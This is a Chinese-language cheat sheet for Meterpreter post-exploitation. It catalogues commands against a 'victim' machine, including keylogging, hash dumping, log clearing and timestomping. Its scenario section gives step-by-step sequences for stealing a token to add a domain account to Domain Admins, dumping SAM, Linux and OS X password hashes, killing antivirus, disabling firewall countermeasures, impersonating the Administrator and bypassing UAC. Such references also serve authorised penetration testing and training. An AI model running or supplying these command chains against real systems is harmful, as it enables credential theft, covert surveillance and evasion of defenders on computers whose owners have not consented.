Meterpreter Cheet Sheet

命令总览

第1步：核心命令

在其最基本的使用，meterpreter 是一个 Linux 终端在受害者的计算机上。这样，我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统。

这里有一些核心的命令可以用在meterpreter。

? – 帮助菜单

background – 将当前会话移动到后台

bgkill – 杀死一个后台 meterpreter 脚本

bglist – 提供所有正在运行的后台脚本的列表

bgrun – 作为一个后台线程运行脚本

channel – 显示活动频道

close – 关闭通道

exit – 终止 meterpreter 会话

help – 帮助菜单

interact – 与通道进行交互

irb – 进入 Ruby 脚本模式

migrate – 移动到一个指定的 PID 的活动进程

quit – 终止 meterpreter 会话

read – 从通道读取数据

run – 执行以后它选定的 meterpreter 脚本

use – 加载 meterpreter 的扩展

write – 将数据写入到一个通道

第2步：文件系统命令

cat -读取并输出到标准输出文件的内容

cd -更改目录

del -删除文件

download-从Client系统文件下载

edit-用 vim编辑文件

getlwd -打印本地目录

getwd -打印工作目录

lcd -更改本地目录

lpwd -打印本地目录

ls -列出在当前目录中的文件列表

mkdir -在受害者系统上的创建目录

pwd -输出工作目录

rm -删除文件

rmdir -受害者系统上删除目录

upload-从Server的系统往Clinet系统上传文件

第 3 步： 网络命令

ipconfig -显示网络接口的关键信息，包括 IP 地址、 等。

portfwd -端口转发

route -查看或修改受害者路由表

第 4 步： 系统命令

clearav -清除了Client的计算机上的事件日志

drop_token -被盗的令牌

execute-执行命令

getpid -获取当前进程 ID (PID)

getprivs -尽可能获取尽可能多的特权

getuid -获取作为运行服务器的用户

kill -终止指定 PID 的进程

ps -列出正在运行的进程

reboot-重新启动受害人的计算机

reg -与受害人的注册表进行交互

rev2self -在受害者机器上调用 RevertToSelf()

shell -在受害者计算机上打开一个shell

shutdown-关闭了受害者的计算机

steal_token -试图窃取指定的 (PID) 进程的令牌

sysinfo -获取有关受害者计算机操作系统和名称等的详细信息

第 5 步： 用户界面命令

enumdesktops -列出所有可访问台式机

getdesktop -获取当前的 meterpreter 桌面

idletime -检查长时间以来，受害者系统空闲进程

keyscan_dump -键盘记录软件的内容转储

keyscan_start -启动时与如 Word 或浏览器的进程相关联的键盘记录软件

keyscan_stop -停止键盘记录软件

screenshot-抓去 meterpreter 桌面的屏幕截图

set_desktop -更改 meterpreter 桌面

uictl -启用用户界面组件的一些控件

第 6 步： 特权升级命令

getsystem -获得系统管理员权限

第 7 步： 密码转储命令

hashdump -抓去哈希密码 (SAM) 文件中的值

请注意 hashdump 会可以跳过杀毒软件，但现在有两个脚本，都更加隐蔽，”run hashdump”和”run smart_hashdump”。查找更多关于那些在我即将举行的 meterpreter 脚本作弊。

第 8 步： Timestomp 命令

timestomp -操作修改，访问，并创建一个文件的属性

后渗透场景分析

在windows主机上使用meterpreter进行提权操作：

meterpreter > use priv
meterpreter > getsystem

从一个给定的进程ID中窃取一个域管理员组令牌，添加一个域账户，并把域账户添加到域管理员组中：

meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\windows\system32>net user metasploit password /ADD /DOMAIN
C:\windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN

从SAM数据库中导出密码的哈希值：

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump

注意：在windows 2008 中，如果getsystem命令和hashdump命令抛出异常情况时，你需要迁移到一个以SYSTEM系统权限运行的进程中。

自动迁移到一个独立进程：

meterpreter > run migrate

通过meterpreter的killav脚本来杀死目标主机运行的杀毒软件：

meterpreter > run killav

针对一个特定的进程捕获目标主机上的键盘记录：

meterpreter > ps
meterpreter > migrate 14360
meterpreter >keyscan_start
meterpreter >keyscan_dump
meterpreter >keyscan_stop

使用匿名方式来假冒管理员：

meterpreter >use incognito
meterpreter >list_tokens -u
meterpreter >use priv
meterpreter >getsystem
meterpreter >list_tokens
meterpreter >impersonate_token IHAZSECURITY\\Administrator

查看目标主机都采用了那些防护措施，列出帮助菜单，关闭防火墙以及其它我们发现的防护措施：

meterpreter >run getcountermeasure
meterpreter >run getcountermeasuer -h
meterpreter >run getcountermeasuer -d -k

识别被控制的主机是否是一台虚拟机：

meterpreter >run  checkvm

在一个meterpreter会话界面中使用cmd shell：

meterpreter >shell

获取目标主机的图形界面（VNC）：

meterpreter >run vnc

使正在运行的meterpreter界面在后台运行：

meterpreter >background

绕过windows的用户账户控制（UAC）机制：

meterpreter >run post/windows/escalate/bypassuac

导出苹果OS-X系统的口令哈希值：

meterpreter >run post/osx/gather/hashdump

导出liunx系统的口令哈希值：

meterpreter >run post/linux/gather/hashdump

提醒：上面的命令一定要弄懂原理，然后才能举一反三，才能把meterpreter发挥的淋漓尽致！
就写到这里了，本来想弄图片的，为了大家用起来方便，还是手打上去吧！”

由于meterpreter太过强大，以后有时间，还会补充的。

刚拿到meterpreter session应该做什么

1. ps 查看AV情况
2. 看是否有必要 migrate
3. sysinfo查看系统信息

参考资料

[1] Metasploit工具Meterpreter的命令速查表
[2] Meterpreter后渗透攻击命令